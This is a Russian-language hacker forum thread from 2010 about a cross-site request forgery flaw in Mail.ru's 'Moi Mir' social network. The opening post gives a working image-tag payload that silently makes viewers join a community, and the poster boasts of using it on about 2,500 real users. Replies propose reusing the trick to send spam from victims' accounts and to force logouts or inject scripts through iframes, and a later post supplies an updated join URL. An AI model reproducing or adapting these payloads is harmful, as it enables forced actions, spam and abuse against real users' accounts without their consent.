CSRF на МОЙ МИР

Discussion in 'Песочница' started by life_glider, 15 Apr 2010.

  1. life_glider

    life_glider Member

    Joined:
    13 Apr 2010
    Messages:
    42
    Likes Received:
    25
    Reputations:
    33
    CSRF на МОЙ МИР(УЖЕ ЗАКРЫЛИ =()

    Можно подделать GET запрос вступления в сообщество
    отправив в сообщении картинку:
    Code:
    <img src='http://my.mail.ru/community/wtfo_o/community-participate?participate=1&back=.gif' alt=""/>
    без спама создал сообщество и в него вступили около 2500 человек.
    Пример:
    http://my.mail.ru/community/ilovemailru/
    Паника:
    http://my.mail.ru/community/shosse/5DB670B26D452A64.html
    Просто из сообщества выйти бало весьма затруднительно
    возможно есть другие идеи?
     
    #1 life_glider, 15 Apr 2010
    Last edited: 16 Apr 2010
    2 people like this.
  2. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    197
    Likes Received:
    17
    Reputations:
    1
    Респект!! =)) Особенно отзывы в гостевой и по второй ссыле понравились. =))
     
    #2 Komyak, 15 Apr 2010
  3. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    235
    Likes Received:
    461
    Reputations:
    452
    если тег <img src=""> проходит нормально в Моем Мире, этого можно извлечь кучу выгод, вступление в группу это лишь кусочек.
    Попробуй активировать им скрипт рассылки писем и получишь бесплатный спамер с разных айпи...

    Делал как то такое на ukr.net и mail.ru, когда тестил. Возможны и другие применения...
     
    _________________________
    #3 Uex Urgent, 15 Apr 2010
  4. life_glider

    life_glider Member

    Joined:
    13 Apr 2010
    Messages:
    42
    Likes Received:
    25
    Reputations:
    33
    logout, попытаться впендюрить скрипт или форму через ифрэйм?
     
    #4 life_glider, 15 Apr 2010
  5. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    Прикольно, респект.)
     
    #5 Jerri, 15 Apr 2010
  6. life_glider

    life_glider Member

    Joined:
    13 Apr 2010
    Messages:
    42
    Likes Received:
    25
    Reputations:
    33
    http://my.mail.ru/community/mama-love/community-participate?mna=627251&mnb=4183580616&participate=1

    теперь в сообщества надо добавляться так. Но по стараму тоже канает.
     
    #6 life_glider, 16 Apr 2010
    Last edited: 16 Apr 2010
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196
    в понедельник прикроем
     
    #7 попугай, 16 Apr 2010
  8. S1ash

    S1ash Banned

    Joined:
    19 Nov 2007
    Messages:
    29
    Likes Received:
    2
    Reputations:
    -10
    еще работает?
    как сделать?
     
    #8 S1ash, 16 Apr 2010
(You must log in or sign up to post here.)